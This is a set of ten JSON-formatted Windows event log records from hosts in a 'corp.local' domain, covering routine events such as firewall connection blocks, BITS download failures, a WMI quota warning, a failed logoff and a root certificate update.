{"EventTime":"2021-08-26T13:44:10.000000+05:45","Hostname":"DC01.corp.local","Keywords":"36028797018963968","EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":5186,"SourceName":"Microsoft-Windows-WAS","ProviderGuid":"{524B5D04-133C-4A62-8362-64E8EDB9CE40}","Version":0,"TaskValue":0,"OpcodeValue":0,"RecordNumber":643688,"ExecutionProcessID":0,"ExecutionThreadID":0,"Channel":"System","Message":"A worker process with process id of '4960' serving application pool 'DefaultAppPool' was shutdown due to inactivity.  Application Pool timeout configuration was set to 20 minutes.  A new worker process will be started when needed.","ProcessID":"4960","AppPoolID":"DefaultAppPool","Minutes":"20","EventReceivedTime":"2021-08-26T13:44:10.292665+05:45","SourceModuleName":"in_win","SourceModuleType":"im_msvistalog"}
{"EventTime":"2021-08-24T18:42:51.088417+05:45","Hostname":"IT01.corp.local","Keywords":"9227875636482146304","EventType":"AUDIT_FAILURE","SeverityValue":4,"Severity":"ERROR","EventID":5157,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":1,"TaskValue":12810,"OpcodeValue":0,"RecordNumber":669153,"ExecutionProcessID":4,"ExecutionThreadID":3572,"Channel":"Security","Message":"The Windows Filtering Platform has blocked a connection.\r\n\r\nApplication Information:\r\n\tProcess ID:\t\t1188\r\n\tApplication Name:\t\\device\\harddiskvolume2\\windows\\system32\\svchost.exe\r\n\r\nNetwork Information:\r\n\tDirection:\t\tOutbound\r\n\tSource Address:\t\t192.168.2.46\r\n\tSource Port:\t\t51163\r\n\tDestination Address:\t45.64.115.163\r\n\tDestination Port:\t\t80\r\n\tProtocol:\t\t6\r\n\r\nFilter Information:\r\n\tFilter Run-Time ID:\t129097\r\n\tLayer Name:\t\tConnect\r\n\tLayer Run-Time ID:\t48","Category":"Filtering Platform Connection","Opcode":"Info","ProcessID":"1188","Application":"\\device\\harddiskvolume2\\windows\\system32\\svchost.exe","Direction":"%%14593","SourceAddress":"192.168.2.46","SourcePort":"51163","DestAddress":"45.64.115.163","DestPort":"80","Protocol":"6","FilterRTID":"129097","LayerName":"%%14611","LayerRTID":"48","RemoteUserID":"S-1-0-0","RemoteMachineID":"S-1-0-0","EventReceivedTime":"2021-08-24T18:42:52.324951+05:45","SourceModuleName":"in_win","SourceModuleType":"im_msvistalog"}
{"EventTime":"2021-08-24T03:59:41.523918+05:45","Hostname":"IT01.corp.local","Keywords":"4611686018427387904","EventType":"WARNING","SeverityValue":3,"Severity":"WARNING","EventID":61,"SourceName":"Microsoft-Windows-Bits-Client","ProviderGuid":"{EF1CC15B-46C1-414E-BB95-E76B077BD51E}","Version":1,"TaskValue":0,"OpcodeValue":2,"RecordNumber":4413,"ActivityID":"{CA6DB3DC-B6B4-4857-A175-060860AE13A2}","ExecutionProcessID":348,"ExecutionThreadID":2324,"Channel":"Microsoft-Windows-Bits-Client/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"BITS stopped transferring the SpeechModelDownloadJob transfer job that is associated with the https://msftspeechmodelsprod.azureedge.net/SR/SV10-EV100/en-us-n/MV101/naspmodelsmetadata.xml URL. The status code is 0x80072EE7.","Opcode":"Stop","transferId":"{ca6db3dc-b6b4-4857-a175-060860ae13a2}","name":"SpeechModelDownloadJob","Id":"{fac5e752-7af3-45df-95c6-302e0fae5b92}","url":"https://msftspeechmodelsprod.azureedge.net/SR/SV10-EV100/en-us-n/MV101/naspmodelsmetadata.xml","hr":"2147954407","fileTime":"1601-01-01T00:00:00.000000000Z","fileLength":"18446744073709551615","bytesTotal":"18446744073709551615","bytesTransferred":"0","peerProtocolFlags":"0","bytesTransferredFromPeer":"0","AdditionalInfoHr":"0","PeerContextInfo":"0","bandwidthLimit":"18446744073709551615","ignoreBandwidthLimitsOnLan":"false","EventReceivedTime":"2021-08-24T03:59:42.470303+05:45","SourceModuleName":"in_win","SourceModuleType":"im_msvistalog"}
{"EventTime":"2021-08-11T11:47:25.437659+05:45","Hostname":"DC01.corp.local","Keywords":"9223372036854775808","EventType":"WARNING","SeverityValue":3,"Severity":"WARNING","EventID":5612,"SourceName":"Microsoft-Windows-WMI","ProviderGuid":"{1EDEEE53-0AFE-4609-B846-D8C0B2075B1F}","Version":2,"TaskValue":0,"OpcodeValue":0,"RecordNumber":115635,"ExecutionProcessID":2124,"ExecutionThreadID":2156,"Channel":"Application","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Windows Management Instrumentation has stopped WMIPRVSE.EXE because a quota reached a warning value. Quota: HandleCount  Value: 4098 Maximum value: 4096 WMIPRVSE PID: 2124 Providers hosted in this process: %systemroot%\\system32\\wbem\\wmiprov.dll, C:\\Windows\\System32\\wbem\\WmiPerfClass.dll","Opcode":"Info","UserData":"<data_0x8000003F xmlns='http://manifests.microsoft.com/win/2006/windows/WMI'><QuotaName>HandleCount</QuotaName><QuotaValue>4098</QuotaValue><QuotaThreshold>4096</QuotaThreshold><ProcessID>2124</ProcessID><ProvidersInHost>%systemroot%\\system32\\wbem\\wmiprov.dll, C:\\Windows\\System32\\wbem\\WmiPerfClass.dll</ProvidersInHost></data_0x8000003F>","EventReceivedTime":"2021-08-11T11:47:27.297016+05:45","SourceModuleName":"in_win","SourceModuleType":"im_msvistalog"}
{"EventTime":"2021-08-10T00:00:24.987964+05:45","Hostname":"IT01.corp.local","Keywords":"9223372036854775808","EventType":"WARNING","SeverityValue":3,"Severity":"WARNING","EventID":16385,"SourceName":"Microsoft-Windows-Bits-Client","ProviderGuid":"{EF1CC15B-46C1-414E-BB95-E76B077BD51E}","Version":0,"TaskValue":0,"OpcodeValue":0,"RecordNumber":24011,"ExecutionProcessID":348,"ExecutionThreadID":3188,"Channel":"System","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"While canceling job \"Edge Component Updater\", BITS was unable to remove some temporary files. To recover disk space, delete the files listed below.  The job ID was {fc0a2758-93c2-4d16-9d95-9a09673ca5d4}.      C:\\Users\\lau\\AppData\\Local\\Temp\\edge_BITS_7068_1127678655\\BIT5FCC.tmp\n","Opcode":"Info","Id":"{fc0a2758-93c2-4d16-9d95-9a09673ca5d4}","Title":"Edge Component Updater","FileList":"    C:\\Users\\lau\\AppData\\Local\\Temp\\edge_BITS_7068_1127678655\\BIT5FCC.tmp\n","EventReceivedTime":"2021-08-10T00:00:25.659297+05:45","SourceModuleName":"in_win","SourceModuleType":"im_msvistalog"}
{"EventTime":"2021-08-04T13:22:34.446811+05:45","Hostname":"IT02.corp.local","Keywords":"36028797018963968","EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":4004,"SourceName":"Microsoft-Windows-Winlogon","ProviderGuid":"{DBE9B383-7CF3-4331-91CC-A3CB16A3B538}","Version":0,"TaskValue":0,"OpcodeValue":0,"RecordNumber":65543,"ExecutionProcessID":0,"ExecutionThreadID":0,"Channel":"Application","Message":"The Windows logon process has failed to terminate the currently logged on user's processes.","EventData.Binary":"E303000000000100","EventReceivedTime":"2021-08-04T13:22:34.804207+05:45","SourceModuleName":"in_win","SourceModuleType":"im_msvistalog"}
{"EventTime":"2021-08-04T13:22:34.446811+05:45","Hostname":"IT02.corp.local","Keywords":"9259400833873739776","EventType":"WARNING","SeverityValue":3,"Severity":"WARNING","EventID":1077,"SourceName":"User32","ProviderGuid":"{B0AA8734-56F7-41CC-B2F4-DE228E98B946}","Version":0,"TaskValue":0,"OpcodeValue":0,"RecordNumber":67793,"ExecutionProcessID":10116,"ExecutionThreadID":8884,"Channel":"System","Domain":"CORP","AccountName":"Leo","UserID":"S-1-5-21-2569713578-3403938347-3732993993-1139","AccountType":"User","Message":"The attempt by user CORP\\Leo to logoff computer IT02 failed","param1":"IT02","param2":"CORP\\Leo","EventReceivedTime":"2021-08-04T13:22:37.054068+05:45","SourceModuleName":"in_win","SourceModuleType":"im_msvistalog"}
{"EventTime":"2021-08-03T16:46:07.622251+05:45","Hostname":"IT03.corp.local","Keywords":"9259400833873739776","EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":4097,"SourceName":"Microsoft-Windows-CAPI2","ProviderGuid":"{5BBCA4A8-B209-48DC-A8C7-B23D3E5216FB}","Version":0,"TaskValue":0,"OpcodeValue":0,"RecordNumber":24262,"ExecutionProcessID":2488,"ExecutionThreadID":956,"Channel":"Application","Message":"Successful auto update of third-party root certificate:: Subject: <CN=DigiCert Trusted Root G4, OU=www.digicert.com, O=DigiCert Inc, C=US> Sha1 thumbprint: <DDFB16CD4931C973A2037D3FC83A4D7D775D05E4>.","Opcode":"Info","EventData":"<Data>CN=DigiCert Trusted Root G4, OU=www.digicert.com, O=DigiCert Inc, C=US</Data><Data>DDFB16CD4931C973A2037D3FC83A4D7D775D05E4</Data>","EventReceivedTime":"2021-08-03T16:46:08.498909+05:45","SourceModuleName":"in_win","SourceModuleType":"im_msvistalog"}
{"EventTime":"2021-08-03T14:49:32.779696+05:45","Hostname":"IT03.corp.local","Keywords":"9232379236109516800","EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4659,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":0,"TaskValue":12800,"OpcodeValue":0,"RecordNumber":40679545,"ExecutionProcessID":4,"ExecutionThreadID":6784,"Channel":"Security","Message":"A handle to an object was requested with intent to delete.\r\n\r\nSubject:\r\n\tSecurity ID:\t\tS-1-5-18\r\n\tAccount Name:\t\tIT03$\r\n\tAccount Domain:\t\tCORP\r\n\tLogon ID:\t\t0x3E7\r\n\r\nObject:\r\n\tObject Server:\tSecurity\r\n\tObject Type:\tFile\r\n\tObject Name:\tC:\\Windows\\WinSxS\\Temp\\PendingDeletes\\54c719934688d7016001000058073418.msvcr120_clr0400.dll\r\n\tHandle ID:\t0x0\r\n\r\nProcess Information:\r\n\tProcess ID:\t0x758\r\n\r\nAccess Request Information:\r\n\tTransaction ID:\t{706f1550-f438-11eb-b4cc-000c29d3d841}\r\n\tAccesses:\tDELETE\r\n\t\t\t\t\r\n\tAccess Mask:\t0x10000\r\n\tPrivileges Used for Access Check:\t-","Category":"File System","Opcode":"Info","SubjectUserSid":"S-1-5-18","SubjectUserName":"IT03$","SubjectDomainName":"CORP","SubjectLogonId":"0x3e7","ObjectServer":"Security","ObjectType":"File","ObjectName":"C:\\Windows\\WinSxS\\Temp\\PendingDeletes\\54c719934688d7016001000058073418.msvcr120_clr0400.dll","HandleId":"0x0","TransactionId":"{706f1550-f438-11eb-b4cc-000c29d3d841}","AccessList":"%%1537\r\n\t\t\t\t","AccessMask":"0x10000","PrivilegeList":"-","ProcessId":"0x758","EventReceivedTime":"2021-08-03T14:49:33.556088+05:45","SourceModuleName":"in_win","SourceModuleType":"im_msvistalog"}
{"EventTime":"2021-08-04T01:07:08.669906+05:45","Hostname":"IT01.corp.local","Keywords":"9227875636482146304","EventType":"AUDIT_FAILURE","SeverityValue":4,"Severity":"ERROR","EventID":5152,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":0,"TaskValue":12809,"OpcodeValue":0,"RecordNumber":434230,"ExecutionProcessID":4,"ExecutionThreadID":4920,"Channel":"Security","Message":"The Windows Filtering Platform has blocked a packet.\r\n\r\nApplication Information:\r\n\tProcess ID:\t\t0\r\n\tApplication Name:\t-\r\n\r\nNetwork Information:\r\n\tDirection:\t\tInbound\r\n\tSource Address:\t\t192.168.2.47\r\n\tSource Port:\t\t389\r\n\tDestination Address:\t192.168.2.46\r\n\tDestination Port:\t\t54734\r\n\tProtocol:\t\t6\r\n\r\nFilter Information:\r\n\tFilter Run-Time ID:\t108993\r\n\tLayer Name:\t\tTransport\r\n\tLayer Run-Time ID:\t13","Category":"Filtering Platform Packet Drop","Opcode":"Info","ProcessId":"0","Application":"-","Direction":"%%14592","SourceAddress":"192.168.2.47","SourcePort":"389","DestAddress":"192.168.2.46","DestPort":"54734","Protocol":"6","FilterRTID":"108993","LayerName":"%%14597","LayerRTID":"13","EventReceivedTime":"2021-08-04T01:07:10.438303+05:45","SourceModuleName":"in_win","SourceModuleType":"im_msvistalog"}